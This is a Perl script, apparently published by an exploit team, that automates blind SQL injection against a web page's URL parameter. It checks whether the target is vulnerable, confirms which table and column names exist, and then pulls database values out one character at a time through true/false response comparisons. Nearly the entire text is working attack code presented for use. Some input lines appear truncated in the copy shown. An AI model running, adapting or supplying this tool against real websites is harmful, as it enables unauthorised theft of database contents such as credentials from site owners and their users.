#!/usr/bin/perl use LWP::Simple; use Time::HiRes qw(gettimeofday); ############################################################### $string=''; $limit=0; #string variable############################################### # if the string that you want to use is not writable # # on the shell you can write in this variable and # # whene the script order from you the variable just # # press enter. # ############################################################### #limit variable############################################## # if you want a particular column just change this # # variable. # ############################################################# @ascii_sym = (32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,58,59,60,61,62,63,64,91,92,93,94,95,96,123,124,125,126); $glob_stat; print "\n\t===============================================*\n"; print "\t* Blind Sql Injection Tool *\n"; print "\t* Coded By Angel Injection *\n"; print "\t* Member From Inj3ct0r Team *\n"; print "\t* Thanks To:r0073r,Sid3^effects,r4dc0re,CrosS, *\n"; print "\t===============================================*\n\n"; print "Stage 1:Checking if the target is vulnerable\n\n"; print "You should now enter the infected url\n"; print "Example :http://www.localhost/index.php?id=1\n\n"; print "URL: "; my $url = ; chomp($url); $now = time_mili(); my $yes = get("$url+and+1=1"); $later = time_mili(); $exect = $later - $now; $exect = sprintf("%.2f", $exect); my $no = get("$url+and+1=0"); def($yes,$no); print "Stage 2 :[*] Checking For A String That Can lead To exploit The Target[*]\n\n"; print " You should now enter a string(from shell or source code)\n"; print " and wait to see if is a good one. Your string must be \n"; print " related to the target\n\n"; print " The string must exist on the true page or the false page \n"; print " but not on both of them.\n"; print " A file has been created under the name string.txt it may help\n"; print " you to choose your string\n\n"; if($string eq ''){ print "String: "; $string = ; chomp($string); while(strc($yes,$no)!=1){ print "String: "; $string = ; chomp($string); } } else{ if(strc($yes,$no)!=1){ print "Please Choose another one\n: "; exit; } } chomp($string); print "\n => Nice choice\n\n"; print "Stage 3 :[*] Extracting Information From Database[*]\n\n"; print " You should now enter The Table name\n"; print " and number of Columns to be extracted\n"; print " and their names and condition on this columns\n"; print " if you want it\n\n"; print "Table Name : "; my $tbname = ; chomp($tbname); print "Columns Number : "; my $num = ; chomp($num); if($num =~ /^[+-]?d+$/){ chomp($num); } else{ while($num !~ /^[+-]?d+$/){ print "Columns Number : "; $num = ; chomp($num); } } chomp($num); my @column,@trcolmun,@numtr,@result; for(my $q=0;$q<$num;$q++){ print "Columns Name : "; $column[$q] = ; chomp($column[$q]); } print "\n Do You have any condition on your information\n"; print " Exemple: where id=1\n\n"; print "(yes/no): "; my $condt = ; chomp($condt); if($condt eq 'yes'){ print "\nEnter Condition: "; $condition=; chomp($condition); } print "\nStage 3-1 :[*] Checking table and columns[*]\n\n"; print " Nothing That You Can do it now\n"; print " just let the script do his job\n\n"; my $pr=chvar("$url+and+(SELECT 1 from $tbname limit 0,1)=1"); if($pr==1){ print " => Table Existe\n"; } else{ print " => Table Dosn't Existe"; exit; } my $j=0; for(my $q=0;$q<$num;$q++){ $pr = chvar("$url+and+(SELECT substring(concat(1,$column[$q]),1,1) from $tbname limit 0,1)=1"); if($pr==1){ $trcolumn[$j] = $column[$q]; print " => Column $column[$q] Existe\n"; $j++; } else{ print " => Column $column[$q] Dosn't Existe\n"; } } $trco = @trcolumn; if($trco==0){ print "\n => No Columns Found\n"; exit; } print "\nStage 3-2 :[*] Extracting Columns length[*]\n\n"; print " The Script is going now to get each\n"; print " columns length\n"; print "\nCounting length of Columns...\n\n"; for(my $q=0;$q<$j;$q++){ my $qj=0; my $ii=1; while($qj==0){ $pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58"); if($pr==1){ $ii++; $pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58"); if($pr==1){ $qj=1; } else{ $ii-- } } $ii++; } $ii -=3; $numtr[$q]=$ii; print " => $trcolumn[$q] : $ii\n"; } for(my $rul=0;$rul<$trco;$rul++){ $result[$rul]=''; } $gtf=0; ($second, $minute, $hour) = localtime(); print "\nExtracting information ...\n\n"; print "Guessing time for each column(in seconds)\n\n"; for(my $idn=0;$idn<$trco;$idn++){ $max = $numtr[$idn] * $exect * 8; $max=sprintf("%.2f", $max); $gtf+=$max; print " #=> $trcolumn[$idn] max time of extraction = $max\n"; } print "\nStart at $hour:$minute:$second (expected time to finish (in seconds) : $gtf)\n\n"; $now1 = time_mili(); for(my $bn=0;$bn<$trco;$bn++){ $nowt = time_mili(); for(my $bnum=1;$bnum<=$numtr[$bn];$bnum++){ my $ascii=opt("$url+and+ascii(substring((select concat($trcolumn[$bn],0x3a)+from+$tbname $condition limit+$limit,1),$bnum,1))"); $result[$bn].=pack("c",$ascii); } $latert = time_mili(); $realt = $latert - $nowt; $realt=sprintf("%.2f", $realt); print " => $trcolumn[$bn] = [$result[$bn]] (real time = $realt)\n"; } $later1 = time_mili(); $exect1 = $later1 - $now1; $exect1 = sprintf("%.2f", $exect1); ($second, $minute, $hour) = localtime() ; print "\nFinish at $hour:$minute:$second (elapsed time (in seconds) : $exect1) \n\n"; sub opt{ my $url=$_[0]; my $isnum = $url; my $sym_st; $isnum .= ">57"; my $isalpha = $url; $isalpha .= ">96"; my $isAlpha = $url; $isAlpha .= ">65"; my $rt=''; my $brp = chvar($isnum); if($brp==1){ my $brp1 = chvar($isalpha); if($brp1==1){ $rt = brute_alpha($url,97,103,110,115,122); $sym_st=3; } else{ $rt = brute_alpha($url,65,71,78,83,90); $sym_st=2; } } else{ $rt = brute_num($url); $sym_st=1; } if(ord($rt) == 0){ $rt = opt_sym($url,$sym_st); } return $rt; } sub opt_sym(){ my $url = $_[0]; my $rt=''; if($_[1]==1){ my $ft = $url; $ft .= ">40"; my $rft = chvar($ft); if($rft==1){ $rt = brute_sym($url,8,15); } else{ $rt = brute_sym($url,0,7); } } else{ if($_[1]==2){ $rt=brute_sym($url,16,22); } else{ $rt=brute_sym($url,23,32); } } return $rt; } sub reduse{ for(my $i=$_[0];$i<=$_[1];$i++){ my $tmp = $_[2]; $tmp .="=$i"; my $qq = chvar($tmp); if($qq==1){ return $i; last; } } } sub brute_sym(){ my $ek; for(my $i=$_[1];$i<=$_[2];$i++){ my $tmp = $_[0]; $tmp .="=$ascii_sym[$i]"; my $qq = chvar($tmp); if($qq==1){ $ek=$i; last; } } return $ascii_sym[$ek]; } sub brute_num(){ my $url = $_[0]; my $ft = $url; my $rt=''; $ft .= ">52"; my $mrp = chvar($ft); if($mrp==1){ $rt = reduse(53,57,$url); } else{ $rt = reduse(48,52,$url); } return $rt; } sub brute_alpha(){ my $url = $_[0]; my $ft = $url; my $sd = $url; my $td = $url; my $rt =''; $ft .= ">$_[2]"; $sd .= ">$_[3]"; $td .= ">$_[4]"; my $mrp = chvar($ft); if($mrp==1){ my $mrp1 = chvar($sd); if($mrp1==1){ my $mrp2=chvar($td); if($mrp2==1){ $rt = reduse(($_[4]+1),$_[5],$url); } else{ $rt = reduse(($_[3]+1),$_[4],$url); } } else{ $rt = reduse(($_[2]+1),$_[3],$url); } } else{ $rt = reduse($_[1],$_[2],$url); } return $rt; } sub strc{ my $tmp=0; if(($_[0] =~ /$string/) && ($_[1] !~ /$string/)){ $glob_stat=1; return 1; } elsif(($_[1] =~ /$string/) && ($_[0] !~ /$string/)){ $glob_stat=0; return 1; } elsif(($_[1] =~ /$string/) && ($_[0] =~ /$string/)){ return 0; } } sub def{ my @fi = split(//,$_[0]); my @sd = split(//,$_[1]); my $rt=''; my $cn = @fi; my $cn1 = @sd; my $k; ($cn>$cn1) ? $k=$cn : $k=$cn1; my $i,$j=0; for($i=0;$i<$k;$i++){ if($fi[$i] ne $sd[$i]){ $rt.=$fi[$i]; $j++; } } if(($j>5) && ($j<($i-300))){ print "\n => Target Maybe Vulnerable\n\n"; open(MYFILE,'>string.txt'); print MYFILE $rt; close(MYFILE); } else{ print "\n => Target Not Vulnerable\n\n"; exit; } } sub chvar{ my $url=$_[0]; my $tmp = get($url); if($tmp=~/$string/){ if($glob_stat==1){ return 1; } elsif($glob_stat==0){ return 0; } } elsif($tmp!~/$string/){ if($glob_stat==1){ return 0; } elsif($glob_stat==0){ return 1; } } } sub time_mili(){ my $s,$m,$r; ($s,$m) = gettimeofday(); $r = "$s.$m"; $r +=0; my $rt = sprintf("%.3f", $r); $rt +=0; return $rt; }